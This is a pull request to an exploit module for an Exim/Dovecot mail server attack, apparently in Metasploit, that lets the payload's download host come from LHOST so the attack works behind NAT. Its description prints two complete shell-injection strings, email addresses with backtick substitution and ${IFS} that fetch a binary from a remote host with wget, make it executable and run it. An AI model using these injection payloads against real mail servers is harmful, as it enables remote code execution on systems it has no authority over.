### PR TITLE
Support LHOST for metasploit behind NAT

### DIFF
--- a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
+++ b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
       #we use SRVHOST as download IP for the coming wget command.
       #SRVHOST needs a real IP address of our download host
       if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
-        srv_host = Rex::Socket.source_address(rhost)
+        srv_host = datastore['LHOST'] || Rex::Socket.source_address(rhost)
       else
         srv_host = datastore['SRVHOST']
       end


### PR DESCRIPTION
This module (for unknown reasons) forces the use of SRVHOST which can be bound to the interface (e.g. 0.0.0.0). Unlike LHOST, which can use any string for a reverse payload but still binds to 0.0.0.0, this module doesn't work if using behind NAT because SRVHOST will bind to any, but the shell injection will use a non routable address. So I changed it to use LHOST (if set), so that the payload will use the msf IP address.

Before:
`
<LbE`/usr/bin/wget${IFS}192.168.1.1/ZRBIdHUrJjByRY${IFS}-O${IFS}/tmp/pdadacyl`chmod${IFS}+x${IFS}/tmp/pdadacyl`/tmp/pdadacyl`@debian.localdomain>`

After:
`
<LbE`/usr/bin/wget${IFS}203.1.1.1/ZRBIdHUrJjByRY${IFS}-O${IFS}/tmp/pdadacyl`chmod${IFS}+x${IFS}/tmp/pdadacyl`/tmp/pdadacyl`@debian.localdomain>`
